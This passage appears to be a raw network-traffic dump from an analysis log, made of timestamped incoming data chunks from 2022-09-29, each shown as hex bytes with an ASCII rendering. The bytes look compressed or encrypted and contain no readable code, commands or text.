                                                                                                                                                            2022-09-29 12:45:19 UTC28212INData Raw: 8a 23 39 cd b5 5c ac ac 6b c2 11 83 05 fe eb 8d af a9 55 3a fa 9f 7d 3d a1 c2 03 b7 16 5b 4d 24 46 fb ff 7a 31 b6 ae 02 2a 95 6a 86 37 ad af b5 9e 4a c8 da 6c ce ce 08 54 78 7a ad a3 51 bc 41 3b d2 7b 3c 4d 71 d1 49 79 c0 48 b9 01 f3 ab ee f7 7f bb b3 e4 a1 17 60 ff c0 9d 71 35 c1 89 1c b7 bc 32 55 ee 6c e9 1b 4a 40 f9 8a 29 c2 e5 e0 e7 8e e5 34 c3 04 81 f7 59 85 8e d9 12 08 11 e4 a3 7a 26 a6 ad 55 a2 7c 2a 07 11 a6 06 b2 32 d9 12 53 69 8b e2 07 83 ac a0 d1 d4 fc f2 00 e7 25 be 6a 41 bc 5b 99 af c2 72 98 14 0b 80 11 91 22 83 14 8b 40 3c 85 1f e7 a1 a6 8b 48 d6 73 fa 3d 32 fb 07 9e a5 6c b5 48 72 fc ad 98 c9 28 74 be ad cc 28 61 0e 70 66 eb cd 1f 99 91 8d b3 5f 46 10 8a 08 d6 95 72 14 7c 9c df 76 84 c6 04 1a 8c ed 52 9b c5 0b af 3d 44 ba 4f 87 ca b9 3f 16
                                                                                                                                                            Data Ascii: #9\kU:}=[M$Fz1*j7JlTxzQA;{<MqIyH`q52UlJ@)4Yz&U|*2Si%jA[r"@<Hs=2lHr(t(apf_Fr|vR=DO?
                                                                                                                                                            2022-09-29 12:45:19 UTC28228INData Raw: 8e 42 98 85 e3 ef 3a f9 6f 1f ef 63 b8 50 df 3b da 9c 72 c0 24 4b cb d1 d5 5d 56 89 e1 0c 46 da a6 0d f6 bf 1a ba 5c 78 3c 3f cc 42 a4 63 36 5b a7 8e 18 1e 84 54 8c 9d 1a 16 10 fa 62 dc 86 e4 2f 04 26 ad a9 4b d1 c5 58 73 9a 14 8b 46 59 01 d5 ef 66 7f 45 6d 70 4d cc c6 ec 03 10 50 73 a1 ff 84 66 50 28 3b 48 2e 9d 30 7b e5 14 a9 24 86 06 a5 7a ed b1 2f 74 36 db 6c 43 fd 93 25 78 87 cc a2 59 7c 26 ed 35 c3 ea d2 3d 53 b5 c3 e7 c8 2a a6 38 5e 5b 17 4f ba 90 25 f0 cb b0 f6 a1 aa e6 9e 2e 95 cb f8 de 69 53 34 2e 5f ab b1 3f 5c b4 93 4c d5 3d 0a a0 6e d6 83 74 ab 09 2e 21 05 da 12 4d 0f 67 87 b9 98 e1 b8 a3 4f 86 f7 59 53 32 5f fd df 53 9f 94 ba e2 4f 52 a3 c4 59 41 4a 03 cc dc a5 f2 c4 c4 1b 74 9a 0a 39 53 39 83 c9 60 a5 d7 fe 61 bf 46 a6 b1 28 ab ab 64 00 9f
                                                                                                                                                            Data Ascii: B:ocP;r$K]VF\x<?Bc6[Tb/&KXsFYfEmpMPsfP(;H.0{$z/t6lC%xY|&5=S*8^[O%.iS4._?\L=nt.!MgOYS2_SORYAJt9S9`aF(d
                                                                                                                                                            2022-09-29 12:45:19 UTC28244INData Raw: 7b 0a 19 0a cd 88 98 93 4c ce 3c 9f d7 2e 0f bb 5b d5 b6 0c e5 ad 45 a7 11 9f d7 c7 d7 cc 12 6c 9f 18 ba 9f 7c bd aa d3 a4 ed 93 9c 3f 53 69 64 4b 94 96 30 8a cd e4 0e 18 71 d7 cc 1d 8f cd b0 85 c9 0e ea d7 57 9d e0 5b da 96 77 f7 de 38 92 35 09 a0 0b df 53 f4 96 8d 98 69 ba 81 15 16 2b aa e1 cb 4d bd 84 a4 a1 95 a6 4a 2e 6b d9 93 5e dd 6e cf b4 5f ee 2e a9 f3 9a ff 1a 23 fc a4 bf 82 30 3e 3a 3e 00 d5 0a 39 18 9d e3 8f 1b 57 7c 17 2f 87 76 b9 04 58 07 8e eb cf bf 17 dc 60 59 01 cb 92 41 d6 be 6c 33 6c a0 88 0d d9 ae c2 29 dd 91 a1 7b 60 78 31 43 15 db ad 5b 04 07 91 64 7d 79 eb 9c bc 9f 00 7a 24 f9 fb a1 d8 19 8d 65 06 f1 bd 89 10 0c 75 4e 33 a0 31 cd 98 e5 61 11 70 6c d7 52 49 d3 2a b5 ab 81 ef 8e c7 0e 9b d0 38 51 f7 96 bb a0 04 a7 be d6 93 62 e0 88 84
                                                                                                                                                            Data Ascii: {L<.[El|?SidK0qW[w85Si+MJ.k^n_.#0>:>9W|/vX`YAl3l){`x1C[d}yz$euN31aplRI*8Qb
                                                                                                                                                            2022-09-29 12:45:19 UTC28260INData Raw: e1 c8 02 e1 81 20 d6 e9 a8 85 58 bf 44 17 ea c1 09 1b ea 95 ca e0 31 ea a8 e8 9a 8d 55 c4 c8 81 c8 8b a6 5f b1 08 e1 bb 8f c4 90 41 ba e2 77 f5 bf b2 74 bc ef ab 4b 46 62 a7 95 c2 15 d5 fe 25 53 8b 76 03 07 2d 38 47 11 8b 04 b1 be 43 e5 a6 4a dc ac c2 bd 65 d3 7b 84 24 e5 63 74 6a 36 5c 51 46 39 2e 85 0c 64 8e bd ca 6c 40 6b 2b 19 37 d0 71 4f 44 82 8b 48 92 1f a9 6a 3f 1a 58 16 03 72 c5 d3 85 3c d8 33 e2 a5 c0 1a 33 af f3 fa 0d b3 f5 ae 2b b6 aa f0 39 01 64 e3 dc 7b 4f 96 b4 ed 09 b3 73 60 42 5b 93 c1 a0 ff 3f 0a c4 96 49 ca c2 8a d3 e9 90 42 9b ef 9a 59 16 74 77 47 4e 80 29 f4 3c 0f 81 46 82 15 23 f9 fd d8 b3 e0 19 c0 ea 65 97 01 8b fb 5d fc 0f 4e 5d ec cd 71 2d 16 ce 1d a1 88 96 9d 10 c5 15 2d a4 8c cb f8 40 50 f1 9c 85 2d cb 43 34 97 69 3c c6 cc b6 3f
                                                                                                                                                            Data Ascii: XD1U_AwtKFb%Sv-8GCJe{$ctj6\QF9.dl@k+7qODHj?Xr<33+9d{Os`B[?IBYtwGN)<F#e]N]q--@P-C4i<?
                                                                                                                                                            2022-09-29 12:45:19 UTC28276INData Raw: 49 de d3 75 cb 61 d4 41 f9 b9 f0 f8 31 e6 a3 05 bb 25 cb a2 cd 4e 6a ff af 9d cb a9 9e c1 30 58 48 e7 29 c7 98 4f 25 3a 5f a1 37 cb 90 1f d8 c7 bc 60 70 b8 1f 3e ea cf 28 67 e4 4f 8a 52 c1 87 c5 39 77 b7 3a 45 f7 2f 29 6d 51 66 63 fd 41 ff dd 07 e9 85 21 86 cf 14 c6 1e 6c 88 91 c8 a7 21 5a 4c 91 70 e9 61 62 35 47 ec 95 ef bc 7d ab 50 a8 e6 be 1a f6 ac 77 d0 33 78 98 6e af be fe 3d 53 54 55 80 70 4a 9a ec ff d1 b5 a3 2e db 06 4b 44 18 b2 7f 48 af ae 46 f0 69 d1 f7 87 1d 6a a8 61 c2 dc 08 22 1d 1c 7d c1 42 6c 05 78 d0 b0 3e 3b 40 24 71 97 e6 e1 2e e8 eb 5e 53 23 09 4f aa eb be e1 24 04 99 29 87 ca 9f 5c f5 a7 e6 d0 0c 84 2a cf 94 e1 a8 8d 52 7d e6 d9 a5 86 82 bf cb b1 0b 8c 3f b1 41 c9 29 52 1f e2 e0 6b 1a bb 70 22 16 42 91 f1 45 36 c0 27 93 ac 1c 8c 8c c2
                                                                                                                                                            Data Ascii: IuaA1%Nj0XH)O%:_7`p>(gOR9w:E/)mQfcA!l!ZLpab5G}Pw3xn=STUpJ.KDHFija"}Blx>;@$q.^S#O$)\*R}?A)Rkp"BE6'
                                                                                                                                                            2022-09-29 12:45:19 UTC28292INData Raw: 49 b1 70 ed 27 3c 18 a9 71 d1 33 90 41 7e 64 e0 71 7e 6b 9a 65 d4 72 33 08 ed 29 f7 4e 03 4d 38 1f 43 d5 c9 e7 66 ce 02 bc 4b da 75 80 9a 65 44 ad 5c b2 f0 3d d2 4c 63 81 25 45 88 8f d7 ee 27 b4 98 cb 88 7c d6 30 ac f5 ef 29 32 8e 1a 47 45 5d a7 28 70 fd 4f f6 7a 97 fc bf 5c c9 f0 2b 83 18 a6 fc d3 5c 6f 0b 8a 75 d1 f1 fa 88 bb 75 f6 b7 96 d1 e1 87 1e 9e fa 21 6a 4e 9b 62 ac 7d df f4 51 6c 29 68 8e d0 50 07 52 a3 b3 0c af 94 69 4f 51 c2 ee 5f e5 fe b3 29 1f f5 ce 3a 42 37 96 2a d2 ce 92 a2 b8 87 a9 d7 2d 5a d1 9c 63 45 e5 1a 19 c4 7b 29 30 f3 4a a2 a1 0f 7f d8 ec 5f 4f 01 bb 15 1f be eb 1d 98 f1 b1 3d 5e 83 7c 19 ca c7 99 9c f2 0f 01 0a 49 11 35 8f dc 2d 4b 1b 42 5b 6d f4 9a 7f e7 91 11 b0 56 59 9c df 09 57 39 54 78 8f 57 58 87 33 df 69 d6 a6 6e 06 1f 05
                                                                                                                                                            Data Ascii: Ip'<q3A~dq~ker3)NM8CfKueD\=Lc%E'|0)2GE](pOz\+\ouu!jNb}Ql)hPRiOQ_):B7*-ZcE{)0J_O=^|I5-KB[mVYW9TxWX3in
                                                                                                                                                            2022-09-29 12:45:19 UTC28308INData Raw: 88 af 3b 81 cc 55 84 ad a6 98 cf 8b 78 08 db 3e 62 50 37 d8 6d 38 e6 4d 7f cc d9 19 aa 74 d0 b9 da 22 1a 6b 87 65 f9 de 6d d2 e8 28 73 16 28 f6 f6 8e 8f 50 da 90 18 19 f6 f8 49 25 4a a9 59 8e 91 0d 06 46 19 b2 0a e3 b4 80 08 67 8f 79 4e 24 81 77 c3 d5 2a b6 8e 0f 6b 2c 3a 0e bc 32 e1 de c2 86 e7 89 b3 c2 c0 6c c9 36 6e 19 af fa e4 e2 fe 39 06 f8 cb ac f4 e3 6b 91 ca 2a 8e e3 70 dd a7 03 af 12 3b 5f 13 05 58 c5 62 f2 58 81 49 66 56 88 b9 92 eb 04 8a 6e a9 3e 02 e6 5e e4 2f 4e 36 3a f8 ec 13 10 a2 4f dc db 67 33 fe 93 74 63 0e b3 b5 3c 8a de dd 95 95 19 cc 40 61 ee 02 86 ab 39 ea 2a 35 69 2f 53 17 49 49 61 19 8d 3b 9a 91 14 2b 48 be c0 e4 4d 18 9e a5 3f 5e bd b0 f7 ca 1f 4f ad c1 00 f9 b5 d2 b5 be 15 b7 21 a7 82 b6 5a 3d 11 ab 6f 51 46 2e 0a 87 5d 24 06 66
                                                                                                                                                            Data Ascii: ;Ux>bP7m8Mt"kem(s(PI%JYFgyN$w*k,:2l6n9k*p;_XbXIfVn>^/N6:Og3tc<@a9*5i/SIIa;+HM?^O!Z=oQF.]$f
                                                                                                                                                            2022-09-29 12:45:19 UTC28324INData Raw: a6 6e c8 2e 0f 04 09 eb 4b 00 58 60 d4 5e 99 bc 50 2e dd 77 f4 eb 78 bc 59 4e 52 7d aa a3 83 5e b0 08 b4 b9 6e aa 65 33 4a c3 eb eb 87 a7 86 64 c0 67 9f 59 c1 cc 08 1f ac 41 73 1c 69 33 83 cc 71 4c da c6 50 ac 23 8f 40 3e 9c 4e 58 39 e5 11 ac 29 ef 7f db de 34 cb 45 89 9f f0 53 04 a3 4e 96 77 19 bb ef 8d f5 f4 8c 02 cf b1 26 04 1e ee 16 79 bc 86 7e b6 50 a8 31 17 71 39 01 fe d0 ad 47 70 40 96 af d9 af 00 88 7d f4 60 0d 76 3c d9 26 ab f5 be 57 da 9a f5 f0 85 b2 06 94 d7 33 7a 5e 2e 97 1e c9 21 8d 7a bf ba c1 70 2d 76 32 44 b1 a8 45 51 c1 4b 36 67 33 ed 37 21 dd 7b 02 05 16 bc 37 8f 60 4e eb 08 cc fd 54 c2 39 a8 4b 68 2e ec fc 6a f4 f7 51 5b 3f 37 09 93 3a 26 04 11 f3 f7 2f 7b cf 28 45 40 2d c5 2e d4 b7 8c 30 24 fb a9 d8 93 36 98 1a b0 e8 b2 68 4b 9f f6 f7
                                                                                                                                                            Data Ascii: n.KX`^P.wxYNR}^ne3JdgYAsi3qLP#@>NX9)4ESNw&y~P1q9Gp@}`v<&W3z^.!zp-v2DEQK6g37!{7`NT9Kh.jQ[?7:&/{(E@-.0$6hK
                                                                                                                                                            2022-09-29 12:45:19 UTC28340INData Raw: 48 a2 3d a2 83 e9 de a0 55 9d 80 75 5b 28 45 b7 ef 8d b2 41 22 a7 b0 9c 4d 4e 6d 7d 1a a4 b1 d1 f1 05 bf 8d 8a 40 de 11 f6 54 bd 16 13 83 3c 06 d4 a4 12 41 7c 11 aa dc f2 d8 4c a2 4f 68 e5 04 81 cb 29 4a f3 f2 6b 6c 64 da e0 9c e1 df 50 92 eb f0 c0 5d bf 92 d3 4a 68 d9 71 d0 98 99 96 1e b7 bc 09 a5 1b ff d8 d8 84 c3 1f fc c0 7a 6b 2b b2 73 f6 ab f0 ac 45 fa 3a 06 e3 aa 50 19 03 e2 51 b8 f0 bc 6e 27 2c 31 63 85 58 d1 58 8e 84 6e 1b 86 37 e5 d4 cb e3 6a 4a 3c 54 6d 38 b4 6d 6f 2a 5a a5 b2 94 07 33 d9 66 6b ff 97 f5 d4 4d ba b7 18 1e bc 71 58 41 d9 72 7f 26 df bf b0 c1 7b 12 92 05 93 76 63 23 73 17 70 54 ba 97 eb 8f e4 0d e9 81 d9 23 3d 37 21 2f bd 13 ee 09 3d 46 8d c3 15 cb 38 c4 51 bf b2 67 97 b2 2b d0 4c 26 2d 5f 53 1b 8a ba 29 ed 05 4a 21 a9 71 f4 e0 3c
                                                                                                                                                            Data Ascii: H=Uu[(EA"MNm}@T<A|LOh)JkldP]Jhqzk+sE:PQn',1cXXn7jJ<Tm8mo*Z3fkMqXAr&{vc#spT#=7!/=F8Qg+L&-_S)J!q<
                                                                                                                                                            2022-09-29 12:45:19 UTC28356INData Raw: 21 40 57 37 ba d4 9b 96 45 2a 11 d5 1f 67 89 85 a1 85 18 38 46 fe f2 0f c8 42 bd 7d fd 80 d0 c6 24 ed 87 63 4e 02 21 db 41 36 15 29 83 e3 43 12 b1 29 8e 64 c9 05 f2 cc 48 8b ec eb 91 be 31 5b 4a a9 0d 85 ce 0b e8 8e 8b 97 9e f5 5b 95 2a 13 06 a5 8e 22 6f 55 4c 00 c2 63 14 f4 b5 b8 22 14 e5 49 4b f1 94 36 8d 32 20 26 69 14 d5 d2 fe 93 06 4a 80 94 a6 cd 58 db 20 96 6c 39 25 74 c2 bc eb 89 06 64 6f 7e 4b b2 fb 80 02 e3 74 cc 26 63 9a 1f 1a 17 01 70 c6 5c 30 ee b9 05 16 f9 26 b3 33 cf 95 75 a0 5a 03 67 22 c3 c4 4c 12 0d 44 88 2f 79 3d 1d 06 33 71 12 ac c6 b5 4e 75 2f b4 14 bf ae 93 f3 7d 8f 47 1d 4d 6c 7e 93 48 d3 26 11 86 13 f6 c7 7b 8e 87 36 db 4a 8b 09 7e 3b 43 7e 68 2d c3 2e 59 07 f9 e1 5c b1 1e 87 90 69 03 4a 90 b8 54 a8 ab 53 d5 93 1d b2 a3 e2 f8 11 0d
                                                                                                                                                            Data Ascii: !@W7E*g8FB}$cN!A6)C)dH1[J[*"oULc"IK62 &iJX l9%tdo~Kt&cp\0&3uZg"LD/y=3qNu/}GMl~H&{6J~;C~h-.Y\iJTS
                                                                                                                                                            2022-09-29 12:45:19 UTC28367INData Raw: 87 f9 33 63 3d bf 53 56 0d d8 70 c3 d1 7d 8f 8c 4d b0 79 75 9c dd e8 35 95 9c bb 89 ab 88 59 e0 5e a2 81 9b 77 ea d2 f2 1e 69 1e da a2 e7 12 21 91 93 e1 f2 c0 43 22 38 94 d4 17 4f c0 4a 1b d7 f0 9b 0d f2 8c a5 e0 5e ac ac 26 c9 74 be b5 c8 3d 89 95 0c 14 b1 22 f6 0e 1c 39 f7 bf bc 65 21 93 5e 00 49 a7 9b 5c 28 3f d1 ff bf b1 fd e7 c5 69 2e ab a3 6b 04 d8 6e 0a 78 d6 c4 a1 6b 58 a0 da ab 8b b9 b3 b6 b1 d1 3a 29 4a ba c7 5c 10 46 a8 42 e1 c8 36 11 17 a8 69 5b 50 5c b6 f1 95 10 51 24 02 67 7b e9 5f 21 5d 2e ad 5b ff 9a eb 3d fa 69 73 3e 6e 9c ca 68 31 c3 1b 8f 89 0c ea 3d 93 b7 78 2d 71 ef 54 f4 df 11 3f 6d 9e 51 53 6b c9 3a b7 dd bb 65 13 84 85 b7 1b 29 f3 11 2e 9b f5 36 ab a1 67 bc 35 f1 a9 24 4e 85 aa 48 ad 9d 39 cd 4e 7b 21 5c 3f 6d bb 04 02 88 f4 4a 7b
                                                                                                                                                            Data Ascii: 3c=SVp}Myu5Y^wi!C"8OJ^&t="9e!^I\(?i.knxkX:)J\FB6i[P\Q$g{_!].[=is>nh1=x-qT?mQSk:e).6g5$NH9N{!\?mJ{
                                                                                                                                                            2022-09-29 12:45:19 UTC28383INData Raw: b3 2a 13 bf 7d 91 e8 dd a2 25 39 49 49 c4 b7 2c 12 ca 41 3c 75 1e e4 ae 23 2a c0 de d1 dc b7 28 09 26 18 ab 25 b8 5a be 79 25 fb 5f 87 eb 4b 94 59 1c df e1 c0 9c 38 5f 6c d2 27 c9 06 0e ec 47 b3 f9 c8 f9 b7 5a cd da 00 e4 fe 6c 55 18 3c 4c cd 34 d4 b2 aa 8f 2a 49 65 5b 49 34 87 bd 3c ba 2a 8f c9 b1 fe 50 e1 3c a6 fb 32 54 4e 78 00 8c 55 6e 6b 35 00 0c 8b d4 61 09 f4 da 70 61 64 fe 00 47 17 c0 36 64 9c b8 a9 b8 e9 12 87 a5 c8 7b 33 88 07 a3 8d ba 43 6a c3 41 8f f6 56 0e be b4 cc c6 bd e5 70 74 35 f4 fe 4b 9d ca 6a 31 15 54 01 72 f0 1f ba 65 fa 92 87 a9 08 87 69 be 6f b1 d8 af e0 e2 ed 29 71 98 7e d9 c7 b8 73 6c 03 d8 94 4e f4 b2 06 6e 9b e9 fa 7e 65 09 0b 85 5c 43 6b 7f f4 75 cf ee 7b 55 c4 53 44 11 3c cb 11 53 ac b8 75 cd fe 9a 11 cb 2d e6 20 76 8c 40 6c
                                                                                                                                                            Data Ascii: *}%9II,A<u#*(&%Zy%_KY8_l'GZlU<L4*Ie[I4<*P<2TNxUnk5apadG6d{3CjAVpt5Kj1Treio)q~slNn~e\Cku{USD<Su- v@l
                                                                                                                                                            2022-09-29 12:45:19 UTC28399INData Raw: a5 ea fb 73 1e 59 2c be 94 7a fe da 4b 57 49 40 0f 61 fd 93 79 07 04 7b 2b 2c c1 3c 20 64 b4 8e 98 2e c5 54 c4 a5 bf 8b 93 54 d7 f7 c1 f6 e4 4e 57 88 f7 d0 cf 7a e8 bb 03 16 c4 17 6c 27 f0 7a ea ff ee 36 1f 14 e0 80 dd 21 0a e4 d6 c7 0d 8b 75 4e d3 1e 9b a7 04 39 2f fc b3 1a 88 0f 3e 4a ba 9c 79 9c 39 0f 8c d6 3e 8d 74 9e 0c c6 f9 22 84 2f a6 7a 82 59 44 53 b6 7a 87 15 5e de dd 1b d5 e7 bb 6f 1f 51 44 79 ea 11 38 01 f1 97 30 ab 46 55 3e 01 6b 73 83 0f 75 d6 a5 67 ff f2 93 f6 3a 16 9f 8e 79 4b eb 50 9d 05 8d d3 2e a2 26 ac b6 f9 3d 7c bc f1 b7 56 44 cc ea 74 c5 98 1c 18 8d 88 dd 85 33 f2 26 35 d5 0e 59 37 1f e1 e3 7a 12 70 e3 72 b5 8e 51 e5 61 d2 97 b3 1b 87 27 1c 8f 6e de 49 8d eb 07 f7 45 25 b1 8f 40 38 f2 b1 9d 32 4d 93 d1 82 42 df a0 0b 83 79 16 83 66
                                                                                                                                                            Data Ascii: sY,zKWI@ay{+,< d.TTNWzl'z6!uN9/>Jy9>t"/zYDSz^oQDy80FU>ksug:yKP.&=|VDt3&5Y7zprQa'nIE%@82MByf
                                                                                                                                                            2022-09-29 12:45:19 UTC28415INData Raw: 9d ff af da 8a 15 1e 5d 84 50 0e 43 12 fa 5d 12 ff 66 24 31 d6 a2 6f f2 80 14 5c a2 74 b9 3b 75 4f b8 1b d7 83 82 55 15 a7 fb c6 3f ca 54 13 51 55 47 16 f9 c6 61 dd 87 8e 4e f8 3a 89 aa 88 65 c0 4a b3 49 c9 32 2b fb 4b 5d 60 0d b1 6e ff c7 d7 b3 ed ae 4a f3 58 17 57 ce ec 71 6f 30 ff 96 23 2f 20 86 f7 35 fe 98 32 e9 77 83 6e 8a d6 e9 33 f8 f7 90 e7 23 95 88 4b 28 a9 62 60 11 7f d4 55 2e d5 ca fc d7 76 b9 b4 9b f2 58 ba 83 79 75 98 7b 9d 4a a7 02 83 f0 29 17 f2 a4 9a e8 85 21 28 b5 82 42 41 70 6f e4 97 6e 17 68 12 df 09 8e 2b 3d ae 0a a3 88 80 c6 e9 8f 1d a7 4d 02 c8 28 a0 40 33 b3 eb af bc 89 eb b1 1e 55 9e 40 ca 3a 1a e7 bf 1d 08 93 0d 85 3d c1 79 0f 72 79 a6 05 c0 d0 07 31 db bc 6a ad 50 cd a7 b7 6a d4 94 d6 ac 9e 4c e9 00 d4 8f 60 18 ee 73 fc 35 cb bb
                                                                                                                                                            Data Ascii: ]PC]f$1o\t;uOU?TQUGaN:eJI2+K]`nJXWqo0#/ 52wn3#K(b`U.vXyu{J)!(BAponh+=M(@3U@:=yry1jPjL`s5
                                                                                                                                                            2022-09-29 12:45:19 UTC28431INData Raw: 66 47 a0 be 64 9e 77 f3 f6 9c f6 2e f4 d3 f0 4b e6 66 8d f4 2c 53 45 78 44 97 e9 0b 50 c5 1d 7b fd 74 52 1f fc bd 52 3d b6 82 12 54 92 cb 68 71 18 dd ea 99 7c 6c c1 dd 09 d0 c0 0d 3e 59 36 c6 2c 23 05 cb db f5 46 0c db c7 54 e3 20 62 ce 01 3e 9e 06 d8 31 bd ba 05 e5 4b 65 0f 7a 74 9c 4c 1b 6a ce ac e7 6d 61 a0 8f a7 a5 6b 11 6e e6 b8 f5 b3 3d a3 54 77 7f 8a d1 00 b2 89 cd d1 78 ae e7 99 34 a5 a3 b3 bc d2 27 b3 07 cf b9 cd 49 8c 58 f8 f7 6f 7a d7 a0 e5 a8 42 32 e3 d3 ce d3 ba cb 62 bc d8 3f f1 67 3d d7 9a 6b 12 67 1a 40 bc da 44 b3 c5 8d e8 33 b8 83 d8 5a ee b5 7d 19 3c b7 7e c4 ed 8d ad e1 f8 8d 55 f5 dc 0a 14 83 15 1c 38 b6 6a ed ca f1 62 f5 55 34 6b c0 cd e0 f1 a8 69 c1 14 a4 11 37 3a 91 88 cc 86 e9 1d 3c 3a 5e 8a ad 9f 4e 68 69 ed 3f cd be a8 3a 9d 21
                                                                                                                                                            Data Ascii: fGdw.Kf,SExDP{tRR=Thq|l>Y6,#FT b>1KeztLjmakn=Twx4'IXozB2b?g=kg@D3Z}<~U8jbU4ki7:<:^Nhi?:!
                                                                                                                                                            2022-09-29 12:45:19 UTC28447INData Raw: e4 7f 2b 42 1f 9c eb 45 6c 4f e3 bf 67 ff 09 5f 8d 3b 3b d4 db dc b7 89 24 3c 61 f4 00 85 c0 f9 fc 91 73 fb 78 fc e8 af 62 e7 32 89 24 cc 5f f8 51 6a b3 2a 53 87 6e 82 fe b5 b2 39 de f1 82 fd ea cc 18 69 c4 0c 7c 08 20 8b c4 a9 8b 13 ea 11 e3 6c 38 54 66 5f 0a 4c e0 e3 7f 8f a4 17 a1 49 be 8a 36 ec b4 cc c6 a8 8a 50 8a 91 b9 cf b1 92 3d 4d 90 da ca a5 9e 54 21 1f 2f 5b f4 35 df 66 8b ec 71 ce 0d c6 4d 75 72 7c 99 1d 25 d0 ed a6 a3 f0 f8 8c a6 44 c0 9a c3 58 28 19 77 df dd 50 d2 11 14 f1 f6 ac 8e 70 5b 6b 0b 1e 02 84 50 ca be 2d 5f a1 44 eb 54 ac a4 d7 18 15 07 dd 57 df 84 2a 8a 5b ff f4 58 1d 37 c8 1d 1d 58 ed c8 a7 2d 5b b8 5c b0 19 51 b5 4d 28 00 4f 5c fd e8 04 a6 01 ca 7d 19 1a f1 86 2c a0 ed 9e 5c 8b 71 c3 b5 d5 60 46 08 88 85 9a 11 ba b6 e3 76 82 43
                                                                                                                                                            Data Ascii: +BElOg_;;$<asxb2$_Qj*Sn9i| l8Tf_LI6P=MT!/[5fqMur|%DX(wPp[kP-_DTW*[X7X-[\QM(O\},\q`FvC
                                                                                                                                                            2022-09-29 12:45:19 UTC28463INData Raw: 66 8b e5 0a 21 69 e3 9a e6 b9 c3 68 24 43 2f 24 2a 50 89 ca 77 28 83 6c 13 0e 89 cb 63 7a c0 de 01 b3 a7 73 74 aa 07 c5 c7 95 e1 0c 77 93 3c f1 24 d7 7c ff 91 2b e0 eb 95 f0 a0 97 4f ba b7 96 f1 73 49 70 d9 d5 42 57 17 ea 84 c0 6d 6c 5b 7c fa 0f 9e 22 b6 73 71 a4 1d cd df c1 d6 80 56 9f da 96 14 98 78 6b ac a6 b2 7c 5d 85 cb 0c 36 6b 93 77 df 45 06 50 98 d5 2d de 80 8c b7 04 52 10 62 11 8a b9 84 5e de 32 33 b7 1d 4c 3f 90 8a 2c 13 31 9d 5d b1 79 6c 52 2e e2 02 14 45 cc 28 d2 fb 37 81 34 98 62 14 20 e8 19 44 cc 44 fd 26 1b 68 99 c9 9b f4 35 5e f3 81 74 61 da 07 5d 98 55 c6 fb 36 e9 84 b5 e1 2d 0a 83 59 41 fe a7 e4 de aa 19 1d 9a cc c5 2b ed f5 7d b8 c6 ae 79 59 ed 68 c0 7d eb 35 1c 33 25 12 93 f0 a8 5d 9b 24 49 09 f8 2a 23 d8 35 5b d8 67 26 96 a2 75 c0 ae
                                                                                                                                                            Data Ascii: f!ih$C/$*Pw(lczstw<$|+OsIpBWml[|"sqVxk|]6kwEP-Rb^23L?,1]ylR.E(74b DD&h5^ta]U6-YA+}yYh}53%]$I*#5[g&u
                                                                                                                                                            2022-09-29 12:45:19 UTC28479INData Raw: 56 02 aa 6f 93 3d 77 7d b5 4e 9f d3 7e b8 79 99 e5 38 59 4a 32 82 96 0c 4f 11 72 a5 c8 9d 88 3a fe db a2 fa 6d 4b d7 74 98 83 8f 80 54 68 f4 7b 51 36 81 33 e9 52 4b 86 16 9e 1c 34 33 3d 58 ae 18 33 a1 f2 bc 86 04 6f 95 6c 9e 55 ec cb bd 80 bc 55 cc 34 ef e9 6c d5 ae 74 bd 1e 66 41 81 84 a3 7d ed 41 12 b3 cc 79 5f 76 f9 b5 6c 8c a8 23 fa 34 8e 16 b2 1d 97 08 56 fe ea ce 42 de a2 6e 6e 15 79 62 0a a1 ff 9a c3 19 b5 3f fe 8b 83 15 e7 44 c4 52 14 fe 8a 9c 77 e3 a7 ae 7f 3c 26 14 2a 02 40 37 85 37 c0 16 93 d2 ff 1c 07 2b da 50 c5 af 00 ec 39 37 9d fe fc e2 99 65 d5 2f a1 4e cb 86 25 9b 8c b9 da b1 f5 2f 0b 11 8f e0 ba ee d3 92 fe 5e 7c d6 84 a9 37 bd 39 a8 d5 a9 14 23 01 5e 3e d7 52 e6 5a f0 3d d1 91 a6 19 79 5b a7 08 cd 1e 6d 9d 40 02 3c ab cb 09 3b dd 66 8e
                                                                                                                                                            Data Ascii: Vo=w}N~y8YJ2Or:mKtTh{Q63RK43=X3olUU4ltfA}Ay_vl#4VBnnyb?DRw<&*@77+P97e/N%/^|79#^>RZ=y[m@<;f
                                                                                                                                                            2022-09-29 12:45:19 UTC28495INData Raw: 9e 78 1c 10 45 28 6c 74 cf 11 cb 96 e1 90 77 b4 bc 0c 1f c0 13 26 b1 df 84 8f 14 01 7f 12 3d 73 4c e3 15 99 45 c9 3a 2c 03 c7 58 e0 76 8e db a0 51 98 ea d1 c4 e3 c1 66 76 82 f2 9e 7d fb 37 14 6e fd f4 e5 23 13 60 0a f5 c4 c6 0c 42 fe 46 8b 91 57 97 b5 48 09 1e fb 57 43 02 4d 00 8c 3e 3c 7c 8b be e5 d0 01 c4 20 e9 5e 08 e1 05 f8 3c 99 ba 8d 8e c3 48 7b bd 48 ce 40 17 f0 b5 ea 14 26 53 3a 50 5b 4a a6 b5 5a 20 17 51 45 aa a3 14 ee d4 63 78 00 35 27 08 b6 5f 67 70 82 ae 6b c7 f4 ad 2c 67 1f 19 39 91 f4 29 4d 59 be 9e bd 09 6d cc cb 1c 46 3b f9 98 c6 82 de 4b e8 50 6f d5 c4 13 5d 53 0c 36 54 b1 5d 0c 89 42 f9 2b ca 91 9e 45 29 b7 b9 36 bd 9d 15 ce 4f 1d 92 c6 80 6d 8a c2 14 7e a8 bf 92 55 5a 5c 84 38 0f 36 de 5b 71 47 47 cc 7d fc e6 46 2c 92 90 b1 6f 4d ba 25
                                                                                                                                                            Data Ascii: xE(ltw&=sLE:,XvQfv}7n#`BFWHWCM><| ^<H{H@&S:P[JZ QEcx5'_gpk,g9)MYmF;KPo]S6T]B+E)6Om~UZ\86[qGG}F,oM%
